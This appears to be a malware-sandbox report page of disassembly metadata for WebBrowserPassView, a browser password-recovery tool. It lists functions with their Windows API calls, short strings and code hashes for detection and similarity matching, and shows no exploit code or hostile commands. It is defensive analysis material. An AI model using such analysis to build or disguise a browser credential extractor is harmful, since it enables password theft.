Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
String ID:
API String ID: 822687973-0
Opcode ID: 0e6b7667e56475d7b9f4e87a61fadb8ecb0fd6bc9a92603bad5de248469984c0
Instruction ID: d8a36cc9ebfe16c4016e2f7d8ce927a21bbfbb5a34db6cd482cb30cff4dedb25
Opcode Fuzzy Hash: 0e6b7667e56475d7b9f4e87a61fadb8ecb0fd6bc9a92603bad5de248469984c0
Instruction Fuzzy Hash: F40188B190030866F720F7B5CC86FEB73AC9B4070DF14446AB719E2183D679A9554A6D

Uniqueness

Uniqueness Score: -1.00%

Function 0041938B Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74CB5970,?,004194B6,?), ref: 004193A9
malloc.MSVCRT ref: 004193B0
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,74CB5970,?,004194B6,?), ref: 004193CF
free.MSVCRT(00000000,?,74CB5970,?,004194B6,?), ref: 004193D6

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$freemalloc
String ID:
API String ID: 2605342592-0
Opcode ID: 7272131d04c6d774e786cc75aec82cebd7b04aebb3355190285584dbadfac89e
Instruction ID: ffb41da00ab2b38d2186f0124ec64ac670dece32c0042acda28ef17f3fef3975
Opcode Fuzzy Hash: 7272131d04c6d774e786cc75aec82cebd7b04aebb3355190285584dbadfac89e
Instruction Fuzzy Hash: BBF0B4B260D21E7F7A102A655CC0C7BBB9CD68A2FCB20073FF520911C0D9555C0156B5

Uniqueness

Uniqueness Score: -1.00%

Function 0040A0F1 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 0040A0FF
SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 0040A117
SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 0040A12D
SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 0040A150

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: MessageSend$Item
String ID:
API String ID: 3888421826-0
Opcode ID: 23c7d58ea5e9d2a7b917a314186be0afa9840c28c7dffcbe9a9049126b0066b5
Instruction ID: 6ff75ca8442cb1aaba57c9855211930760e6665974d32c71f4c26f3b37502511
Opcode Fuzzy Hash: 23c7d58ea5e9d2a7b917a314186be0afa9840c28c7dffcbe9a9049126b0066b5
Instruction Fuzzy Hash: A3F06975A0020CBEDB018F958CC1CBFBBB9EB49784F20407AF504EA150D270AE11AB61

Uniqueness

Uniqueness Score: -1.00%

Function 00411F2F Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00411F50
RegisterClassW.USER32 ref: 00411F75
GetModuleHandleW.KERNEL32(00000000), ref: 00411F7C
CreateWindowExW.USER32 ref: 00411FA2

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: HandleModule$ClassCreateRegisterWindow
String ID:
API String ID: 2678498856-0
Opcode ID: b5bbf0ae051fe51f02939c0630202113e2a9289baae73011afc51dd1c0ebc6e3
Instruction ID: 99e030ddf9f13c5852d1981898f16885884db78983a3d6c06d17877ae79c9dc0
Opcode Fuzzy Hash: b5bbf0ae051fe51f02939c0630202113e2a9289baae73011afc51dd1c0ebc6e3
Instruction Fuzzy Hash: 350125B1901229ABD7109FA59C89ADFBFBCFF09710F10422AF108A2240D7B45A448BE8

Uniqueness

Uniqueness Score: -1.00%

Function 00419AB5 Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00419AD2
UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00419AF2
LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00419AFE
GetLastError.KERNEL32 ref: 00419B0C

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: File$ErrorLastLockUnlockmemset
String ID:
API String ID: 3727323765-0
Opcode ID: 986a2fee5f05a16e76f0cef6e54be21541a9d0a22b66a179d935c389a5993231
Instruction ID: f326d1aa279b3286dc61effd62df9caa1a27d224ff9dba1ebef161e5ee26a254
Opcode Fuzzy Hash: 986a2fee5f05a16e76f0cef6e54be21541a9d0a22b66a179d935c389a5993231
Instruction Fuzzy Hash: 5F01D175504208FFDB21DFA4EC84C9B77B8FB81754F20443AF502D5050E634AD48CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0040F1F6 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040F21B
WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,0044F684,00000000,00000000,00000000,?,00000000,00000000), ref: 0040F234
strlen.MSVCRT ref: 0040F246
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040F257

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: ByteCharFileMultiWideWritememsetstrlen
String ID:
API String ID: 2754987064-0
Opcode ID: af324034355b8326fc79afd52d6166ba087be1d4dfb2b911d4ab16e42422411b
Instruction ID: 693f9c66229169b877fb65a07178d670502057314d81cba2c0b658d4e4f309f7
Opcode Fuzzy Hash: af324034355b8326fc79afd52d6166ba087be1d4dfb2b911d4ab16e42422411b
Instruction Fuzzy Hash: B8F04FB680121CBEFB01A7949CC5DEB776CDB05254F0040B2B705D2042E5749E488B78

Uniqueness

Uniqueness Score: -1.00%

Function 0040F187 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040F1AC
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F1C9
strlen.MSVCRT ref: 0040F1DB
WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F1EC

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: ByteCharFileMultiWideWritememsetstrlen
String ID:
API String ID: 2754987064-0
Opcode ID: b6fc7f5051e315d886dd0844a980d33df026f7d5ca875cb3320374fcca0aa7ef
Instruction ID: 214f2a4103aa1d7c130f25418be1d7ef950c2207e9cb189a5e29a9696e3271f8
Opcode Fuzzy Hash: b6fc7f5051e315d886dd0844a980d33df026f7d5ca875cb3320374fcca0aa7ef
Instruction Fuzzy Hash: B0F062B680111CBEEB81A794DC81DEB77ACEB05258F0180B2B749D2041E9749F4C4F7D

Uniqueness

Uniqueness Score: -1.00%

Function 0040374F Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00403774
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403791
strlen.MSVCRT ref: 004037A3
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 004037B4

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: ByteCharFileMultiWideWritememsetstrlen
String ID:
API String ID: 2754987064-0
Opcode ID: 3a8f2ef2901fd1bf96b16f805e9566abfadfd8793c1561c94dc77c8a8d5e4b08
Instruction ID: 1ce7aa51f862e36c5a0d70db4a972110d182e6fdccd903b3ebab4b2d8822c945
Opcode Fuzzy Hash: 3a8f2ef2901fd1bf96b16f805e9566abfadfd8793c1561c94dc77c8a8d5e4b08
Instruction Fuzzy Hash: C6F062B780121CBEFB01A794DCC5DEB776CDB05254F0040B2B705D2042E5749F488B79

Uniqueness

Uniqueness Score: -1.00%

Function 00415DC8 Relevance: 6.0, APIs: 4, Instructions: 38COMMON

Download Yara Rule

APIs

Part of subcall function 0040A33E: memset.MSVCRT ref: 0040A35D
Part of subcall function 0040A33E: GetClassNameW.USER32 ref: 0040A374
Part of subcall function 0040A33E: _wcsicmp.MSVCRT ref: 0040A386

SetBkMode.GDI32(?,00000001), ref: 00415DEF
SetBkColor.GDI32(?,00FFFFFF), ref: 00415DFD
SetTextColor.GDI32(?,00C00000), ref: 00415E0B
GetStockObject.GDI32(00000000), ref: 00415E13

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
String ID:
API String ID: 764393265-0
Opcode ID: 42e4004be367d569ef6b1ed2fd7568d25a8fc534219fc729a21696d2538a26ff
Instruction ID: f6ca766a756f956276b7987b22366021d45869a5efd1f957245e1e0f0cc444aa
Opcode Fuzzy Hash: 42e4004be367d569ef6b1ed2fd7568d25a8fc534219fc729a21696d2538a26ff
Instruction Fuzzy Hash: 2BF04F36500209FBCF116FA4EC0AADE3B65FF85721F10413AF915A41F2CB79A9A49A49

Uniqueness

Uniqueness Score: -1.00%

Function 0040AD77 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(?,?), ref: 0040AD93
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040ADA3
SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040ADB2

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: Time$System$File$LocalSpecific
String ID:
API String ID: 979780441-0
Opcode ID: 500b3f37a8e27eabcf8092cb1f440f01365611260bcda39269a24c65035c9a43
Instruction ID: 31e7aa1bea13d32e7bca6e77574f5e504946d2401e2512c444bffb4365324c75
Opcode Fuzzy Hash: 500b3f37a8e27eabcf8092cb1f440f01365611260bcda39269a24c65035c9a43
Instruction Fuzzy Hash: A0F0FE769112099BEB119BA0DD49BBBB3FCBB4570BF044439E552E1080EB74D4098B65

Uniqueness

Uniqueness Score: -1.00%

Function 004139EE Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00413A08
memcpy.MSVCRT ref: 00413A1A
GetModuleHandleW.KERNEL32(00000000), ref: 00413A2D
DialogBoxParamW.USER32 ref: 00413A41

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memcpy$DialogHandleModuleParam
String ID:
API String ID: 1386444988-0
Opcode ID: 4d87169f9d56b17e00e3402c301ad3cb042f0108c164b9bdc7b5e575712afbe5
Instruction ID: bbec9d8a740cb9b84f1fef4082fdc1a95378a550d55470654ec0ec15965ea30e
Opcode Fuzzy Hash: 4d87169f9d56b17e00e3402c301ad3cb042f0108c164b9bdc7b5e575712afbe5
Instruction Fuzzy Hash: 85F027B2640320ABE310BFB5BC06F463AA4F709B1BF114836F600A51D2C3B949558FDD

Uniqueness

Uniqueness Score: -1.00%

Function 00411855 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000010,00000000,00000000), ref: 004118BE
InvalidateRect.USER32(?,00000000,00000000), ref: 0041190E

Strings

xr@, xrefs: 00411A93

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: InvalidateMessageRectSend
String ID: xr@
API String ID: 909852535-3463887390
Opcode ID: ba6026d9526b87ee37bd19c55eabe9f4096063d0fb6082bcfa7714a2564ce611
Instruction ID: 0293175210dcad0e75e5e34cf014ada8c26fc98d1d87670dbb71c7f4721f3b00
Opcode Fuzzy Hash: ba6026d9526b87ee37bd19c55eabe9f4096063d0fb6082bcfa7714a2564ce611
Instruction Fuzzy Hash: B761F6307002045BCF20EB658885EEE73E6AF44768F52446BF2595B2B2CB79ADC5CB4D

Uniqueness

Uniqueness Score: -1.00%

Function 0040F295 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

wcschr.MSVCRT ref: 0040F2D7
wcschr.MSVCRT ref: 0040F2E5

Part of subcall function 0040B0B2: wcslen.MSVCRT ref: 0040B0CE
Part of subcall function 0040B0B2: memcpy.MSVCRT ref: 0040B0F1

Strings

", xrefs: 0040F321

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: wcschr$memcpywcslen
String ID: "
API String ID: 1983396471-123907689
Opcode ID: 03968bedbba8fd43ed3f28f545e1ed9fa43ac2e70cc11921a3825c77fa5f6545
Instruction ID: 10195603321605bd56750b7816c0d0271b844f9ce746ccc2960791535488f280
Opcode Fuzzy Hash: 03968bedbba8fd43ed3f28f545e1ed9fa43ac2e70cc11921a3825c77fa5f6545
Instruction Fuzzy Hash: DA318371904204EBDF24EFA5C8419EEB7B4EF54324B21417BEC10B76D1DB78A94ACB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040AADB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

wcschr.MSVCRT ref: 0040AB07
memcpy.MSVCRT ref: 0040AB53

Strings

A@, xrefs: 0040AB04

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memcpywcschr
String ID: A@
API String ID: 2424118378-2073013064
Opcode ID: 65d1c98ee92e68f8316e26253cac294d40828dc9945de756115462d34a8b6e5e
Instruction ID: 830330097a83edb220799b64d51470a873f960a000b5f267707f01fc502e4dd1
Opcode Fuzzy Hash: 65d1c98ee92e68f8316e26253cac294d40828dc9945de756115462d34a8b6e5e
Instruction Fuzzy Hash: B121CC32910315ABDB259F18C4809BAB3B9EB50354B50453BEE42E73D1E7B8BC61C6DA

Uniqueness

Uniqueness Score: -1.00%

Function 0040C4A1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 0040A8EC: SetFilePointer.KERNEL32(0040C76D,?,00000000,00000000,?,0040C573,00000000,00000000,?,00000020,?,0040C703,?,?,*.*,0040C76D), ref: 0040A8F9

_memicmp.MSVCRT ref: 0040C4BB
memcpy.MSVCRT ref: 0040C4D2

Strings

URL , xrefs: 0040C4B5

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: FilePointer_memicmpmemcpy
String ID: URL
API String ID: 2108176848-3574463123
Opcode ID: 8b46189477faf47e70554d53ccdcd0d71d59fab45cca677982259d8f08aed264
Instruction ID: e1781fd545be80fe7556f1c298766c282a9e191fb349476702c3e518ab4974fa
Opcode Fuzzy Hash: 8b46189477faf47e70554d53ccdcd0d71d59fab45cca677982259d8f08aed264
Instruction Fuzzy Hash: 8411E335500204FBEB11EF25CC45F5B7BE8EF42348F004066F904AB292E779EA11D7A9

Uniqueness

Uniqueness Score: -1.00%

Function 0040A912 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

_snwprintf.MSVCRT ref: 0040A957
memcpy.MSVCRT ref: 0040A967

Strings

%2.2X , xrefs: 0040A94C

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: _snwprintfmemcpy
String ID: %2.2X
API String ID: 2789212964-323797159
Opcode ID: b028d3dd81a9ff72aad3c771905fcdc4d2240dadb792d078678063d252d14bc1
Instruction ID: 6a588dd7550e73766d5457c33bdc9f1bb05d6c65df0ab8095161fbe55ab5aab1
Opcode Fuzzy Hash: b028d3dd81a9ff72aad3c771905fcdc4d2240dadb792d078678063d252d14bc1
Instruction Fuzzy Hash: A2118272A00308BFEB11DFE8C8829AFB3B4FB45714F118476ED14E7141D6389A158B96

Uniqueness

Uniqueness Score: -1.00%

Function 00419B1C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57fileCOMMON

Download Yara Rule

APIs

UnmapViewOfFile.KERNEL32(?,00000000,00000000,?,00419D38,?,00000000), ref: 00419B54
CloseHandle.KERNEL32(?), ref: 00419B60

Strings

ItA, xrefs: 00419B3F

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: CloseFileHandleUnmapView
String ID: ItA
API String ID: 2381555830-3397558953
Opcode ID: 78d9621554c737ac66a3f4cb29ee58c3d3362d23627f1abe4208ba6ebade4b46
Instruction ID: 8fc27f8f603743712d85b87c8facf7af589576e01e28d81e59fb0ee190f4bb1a
Opcode Fuzzy Hash: 78d9621554c737ac66a3f4cb29ee58c3d3362d23627f1abe4208ba6ebade4b46
Instruction Fuzzy Hash: B3119A32409710DFCB21AF15E984A96B7E4FF40B22B00082EE592976A1C738FC85CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040F4EE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

_snwprintf.MSVCRT ref: 0040F51C
_snwprintf.MSVCRT ref: 0040F53C

Strings

%%-%d.%ds , xrefs: 0040F511

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: _snwprintf
String ID: %%-%d.%ds
API String ID: 3988819677-2008345750
Opcode ID: e1797fb05a737fba52aba767bb24c373e33194b62cf47ebf28a73d56ffb6a049
Instruction ID: 95e02a5c15eeed1d551906e02850d48b35c8b7aee7daa8271261a5313117e4a6
Opcode Fuzzy Hash: e1797fb05a737fba52aba767bb24c373e33194b62cf47ebf28a73d56ffb6a049
Instruction Fuzzy Hash: 4601B575600204AFD720AF19CC82D9BB7ADFB4C718B00443EFD46A7692C639F855CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040B109 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 0040B118
_memicmp.MSVCRT ref: 0040B146

Strings

History, xrefs: 0040B112, 0040B117, 0040B144

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

